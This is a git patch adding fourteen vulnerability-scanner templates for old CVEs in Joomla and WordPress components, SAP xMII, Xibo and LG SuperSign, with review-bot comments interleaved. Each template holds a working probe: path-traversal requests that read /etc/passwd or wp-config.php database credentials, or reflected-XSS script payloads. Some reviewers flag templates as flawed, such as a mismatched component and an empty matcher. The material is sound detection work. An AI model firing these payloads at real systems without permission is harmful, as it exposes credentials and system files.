From c6dbad9e0288ab6de250a8f04acf81da26c46db2 Mon Sep 17 00:00:00 2001
From: daffainfo
Date: Thu, 19 Aug 2021 17:29:24 +0700
Subject: [PATCH] Adding new template
---
CVE-2008-4764.yaml | 27 +++++++++++++++++++++++++++
CVE-2010-0944.yaml | 27 +++++++++++++++++++++++++++
CVE-2010-1979.yaml | 27 +++++++++++++++++++++++++++
CVE-2010-1983.yaml | 27 +++++++++++++++++++++++++++
CVE-2010-2259.yaml | 27 +++++++++++++++++++++++++++
CVE-2010-2682.yaml | 27 +++++++++++++++++++++++++++
CVE-2011-4804.yaml | 27 +++++++++++++++++++++++++++
CVE-2013-5979.yaml | 28 ++++++++++++++++++++++++++++
CVE-2014-4940.yaml | 25 +++++++++++++++++++++++++
CVE-2014-5368.yaml | 29 +++++++++++++++++++++++++++++
CVE-2016-1000139.yaml | 33 +++++++++++++++++++++++++++++++++
CVE-2016-1000146.yaml | 29 +++++++++++++++++++++++++++++
CVE-2016-2389.yaml | 27 +++++++++++++++++++++++++++
CVE-2018-16288.yaml | 27 +++++++++++++++++++++++++++
14 files changed, 387 insertions(+)
create mode 100755 CVE-2008-4764.yaml
create mode 100755 CVE-2010-0944.yaml
create mode 100755 CVE-2010-1979.yaml
create mode 100755 CVE-2010-1983.yaml
create mode 100755 CVE-2010-2259.yaml
create mode 100755 CVE-2010-2682.yaml
create mode 100755 CVE-2011-4804.yaml
create mode 100755 CVE-2013-5979.yaml
create mode 100755 CVE-2014-4940.yaml
create mode 100755 CVE-2014-5368.yaml
create mode 100755 CVE-2016-1000139.yaml
create mode 100755 CVE-2016-1000146.yaml
create mode 100755 CVE-2016-2389.yaml
create mode 100755 CVE-2018-16288.yaml
diff --git a/CVE-2008-4764.yaml b/CVE-2008-4764.yaml
new file mode 100755
index 0000000..4435b80
--- /dev/null
+++ b/CVE-2008-4764.yaml
@@ -0,0 +1,27 @@
+id: CVE-2008-4764
+
+info:
+ name: Joomla! Component com_extplorer 2.0.0 RC2 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the eXtplorer module (com_extplorer) 2.0.0 RC2 and earlier in Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
+ reference: |
+ - https://www.exploit-db.com/exploits/5435
+ - https://www.cvedetails.com/cve/CVE-2008-4764
+ tags: cve,cve2008,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-0944.yaml b/CVE-2010-0944.yaml
new file mode 100755
index 0000000..fed06bf
--- /dev/null
+++ b/CVE-2010-0944.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-0944
+
+info:
+ name: Joomla! Component com_jcollection - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the JCollection (com_jcollection) component for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/11088
+ - https://www.cvedetails.com/cve/CVE-2010-0944
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-1979.yaml b/CVE-2010-1979.yaml
new file mode 100755
index 0000000..21d8522
--- /dev/null
+++ b/CVE-2010-1979.yaml
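Review bot: In CVE-2008-4764.yaml, `reference: |` opens a literal block scalar, so the two `- https://…` lines are stored as one multi-line string with the dashes in it rather than as a YAML sequence. Dropping the `|` (a bare `reference:` followed by the same `- url` items) gives a real list that tooling can iterate and validate. The other eleven templates in this patch that carry more than one reference use the same form. The file header also creates this and the other thirteen templates with mode 100755; they are data files, so 100644 is enough.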
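Review bot: The probe in CVE-2010-0944.yaml ends in `%00`, and nothing in `info` says that detection depends on NUL-byte truncation of the included path. PHP 5.3.4 and later reject NUL bytes in file paths, so a host running the vulnerable component on a newer PHP will most likely not match and will be reported clean. I would record the limit in the description, e.g. `Detection relies on %00 truncation; a negative result on PHP >= 5.3.4 does not show the component is patched.` The same applies to CVE-2010-1979, CVE-2010-1983, CVE-2010-2259, CVE-2010-2682, CVE-2011-4804 and CVE-2013-5979.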
@@ -0,0 +1,27 @@
+id: CVE-2010-1979
+
+info:
+ name: Joomla! Component Affiliate Datafeeds 880 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Affiliate Datafeeds (com_datafeeds) component build 880 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/12088
+ - https://www.cvedetails.com/cve/CVE-2010-1979
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-1983.yaml b/CVE-2010-1983.yaml
new file mode 100755
index 0000000..c72666c
--- /dev/null
+++ b/CVE-2010-1983.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-1983
+
+info:
+ name: Joomla! Component redTWITTER 1.0 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the redTWITTER (com_redtwitter) component 1.0.x including 1.0b11 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php
+ reference: |
+ - https://www.exploit-db.com/exploits/12055
+ - https://www.cvedetails.com/cve/CVE-2010-1983
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-2259.yaml b/CVE-2010-2259.yaml
new file mode 100755
index 0000000..3114b7d
--- /dev/null
+++ b/CVE-2010-2259.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-2259
+
+info:
+ name: Joomla! Component com_bfsurvey - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component for Joomla! allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/10946
+ - https://www.cvedetails.com/cve/CVE-2010-2259
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2010-2682.yaml b/CVE-2010-2682.yaml
new file mode 100755
index 0000000..11ae257
--- /dev/null
+++ b/CVE-2010-2682.yaml
@@ -0,0 +1,27 @@
+id: CVE-2010-2682
+
+info:
+ name: Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna) component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/14017
+ - https://www.cvedetails.com/cve/CVE-2010-2682
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2011-4804.yaml b/CVE-2011-4804.yaml
new file mode 100755
index 0000000..b159420
--- /dev/null
+++ b/CVE-2011-4804.yaml
@@ -0,0 +1,27 @@
+id: CVE-2011-4804
+
+info:
+ name: Joomla! Component com_kp - 'Controller' Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the obSuggest (com_obsuggest) component before 1.8 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/36598
+ - https://www.cvedetails.com/cve/CVE-2011-4804
+ tags: cve,cve2011,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2013-5979.yaml b/CVE-2013-5979.yaml
new file mode 100755
index 0000000..83ee111
--- /dev/null
+++ b/CVE-2013-5979.yaml
@@ -0,0 +1,28 @@
+id: CVE-2013-5979
+
+info:
+ name: Xibo 1.2.2/1.4.1 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in Spring Signage Xibo 1.2.x before 1.2.3 and 1.4.x before 1.4.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the p parameter to index.php.
+ reference: |
+ - https://www.exploit-db.com/exploits/26955
+ - https://www.cvedetails.com/cve/CVE-2013-5979
+ - https://bugs.launchpad.net/xibo/+bug/1093967
+ tags: cve,cve2013,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2014-4940.yaml b/CVE-2014-4940.yaml
new file mode 100755
index 0000000..a2d4666
--- /dev/null
+++ b/CVE-2014-4940.yaml
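Review bot: CVE-2011-4804.yaml names and probes `com_kp` (in `name`, and as `option=com_kp` in `path`), while its `description` is about the obSuggest component, `com_obsuggest`. One of the two is wrong for this CVE id, so a match would be reported against a component the description does not cover. Please check the CVE record and the referenced advisory and make `name`, `path` and `description` agree, or publish the `com_kp` check under its own id.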
@@ -0,0 +1,25 @@
+id: CVE-2014-4940
+
+info:
+ name: WordPress Plugin Tera Charts - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
+ reference: https://www.cvedetails.com/cve/CVE-2014-4940
+ tags: cve,cve2014,wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2014-5368.yaml b/CVE-2014-5368.yaml
new file mode 100755
index 0000000..9b0bd4e
--- /dev/null
+++ b/CVE-2014-5368.yaml
@@ -0,0 +1,29 @@
+id: CVE-2014-5368
+
+info:
+ name: WordPress Plugin WP Content Source Control - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the file_get_contents function in downloadfiles/download.php in the WP Content Source Control (wp-source-control) plugin 3.0.0 and earlier for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the path parameter.
+ reference: |
+ - https://www.exploit-db.com/exploits/39287
+ - https://www.cvedetails.com/cve/CVE-2014-5368
+ tags: cve,cve2014,wordpress,wp-plugin,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "DB_NAME"
+ - "DB_PASSWORD"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2016-1000139.yaml b/CVE-2016-1000139.yaml
new file mode 100755
index 0000000..3053e62
--- /dev/null
+++ b/CVE-2016-1000139.yaml
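Review bot: CVE-2014-4940.yaml requests only `charts/zoomabletreemap.php`, although its own description lists `charts/treemap.php` as a second affected script. A site where only `treemap.php` is reachable would be reported clean. Either add the second script as another `path` entry with the same matchers, or say in the description that only one of the two scripts is checked.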
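Review bot: A match in CVE-2014-5368.yaml means the response body is the target's `wp-config.php`, database credentials included, and the template does not say so anywhere. Anyone who stores or forwards raw scan responses then holds those secrets. I would add a comment above `requests:` such as `# A matching response contains wp-config.php (DB credentials); handle saved responses as secrets and rotate the credentials after a confirmed hit.`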
@@ -0,0 +1,33 @@
+id: CVE-2016-1000139
+
+info:
+ name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS
+ author: daffainfo
+ severity: medium
+ reference: |
+ - https://wpscan.com/vulnerability/0a60039b-a08a-4f51-a540-59f397dceb6a
+ - https://nvd.nist.gov/vuln/detail/CVE-2016-1000139
+ tags: cve,cve2016,wordpress,wp-plugin,xss
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/examples/leadscoring.php?ContactId=%22%3E%3Cscript%3Ealert%28document.domain%29%3B%3C%2Fscript%3E%3C%22"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - '"><"'
+ - 'input type="text" name="ContactId"'
+ condition: and
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2016-1000146.yaml b/CVE-2016-1000146.yaml
new file mode 100755
index 0000000..b45691d
--- /dev/null
+++ b/CVE-2016-1000146.yaml
@@ -0,0 +1,29 @@
+id: CVE-2016-1000146
+
+info:
+ name: Pondol Form to Mail <= 1.1 - Reflected Cross-Site Scripting (XSS)
+ author: daffainfo
+ severity: medium
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000146
+ tags: cve,cve2016,wordpress,xss,wp-plugin
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/wp-content/plugins/pondol-formmail/pages/admin-mail-info.php?itemid=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - ""
+ part: body
+
+ - type: word
+ part: header
+ words:
+ - text/html
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2016-2389.yaml b/CVE-2016-2389.yaml
new file mode 100755
index 0000000..52a02ca
--- /dev/null
+++ b/CVE-2016-2389.yaml
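Review bot: CVE-2016-1000139.yaml has no `description` under `info`, unlike the traversal templates in this patch, and CVE-2016-1000146.yaml lacks it too. A one-line description naming the affected script and parameter (here `leadscoring.php` and `ContactId`) and stating that the finding is reflected XSS lets a triager judge a hit without opening the references.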
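Review bot: As shown on this page, the body matcher in CVE-2016-1000146.yaml has the single word `""`. An empty word is found in every body, so the template would reduce to status 200 plus a `text/html` header and would flag any site that answers this path with an HTML page, for example a soft-404. If the file really contains an empty string (the page rendering may have dropped markup from it), the word should be the exact payload as sent, unescaped, so that an HTML-encoded reflection does not match.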
@@ -0,0 +1,27 @@
+id: CVE-2016-2389
+
+info:
+ name: SAP xMII 15.0 - Directory Traversal
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the GetFileList function in the SAP Manufacturing Integration and Intelligence (xMII) component 15.0 for SAP NetWeaver 7.4 allows remote attackers to read arbitrary files via a .. (dot dot) in the Path parameter to /Catalog, aka SAP Security Note 2230978.
+ reference: |
+ - https://erpscan.io/advisories/erpscan-16-009-sap-xmii-directory-traversal-vulnerability/
+ - https://www.cvedetails.com/cve/CVE-2016-2389
+ tags: cve,cve2016,lfi,sap
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
diff --git a/CVE-2018-16288.yaml b/CVE-2018-16288.yaml
new file mode 100755
index 0000000..7f8f868
--- /dev/null
+++ b/CVE-2018-16288.yaml
@@ -0,0 +1,27 @@
+id: CVE-2018-16288
+
+info:
+ name: LG SuperSign EZ CMS 2.5 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: LG SuperSign CMS allows reading of arbitrary files via signEzUI/playlist/edit/upload/..%2f URIs.
+ reference: |
+ - https://www.exploit-db.com/exploits/45440
+ - https://www.cvedetails.com/cve/CVE-2018-16288
+ tags: cve,cve2018,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200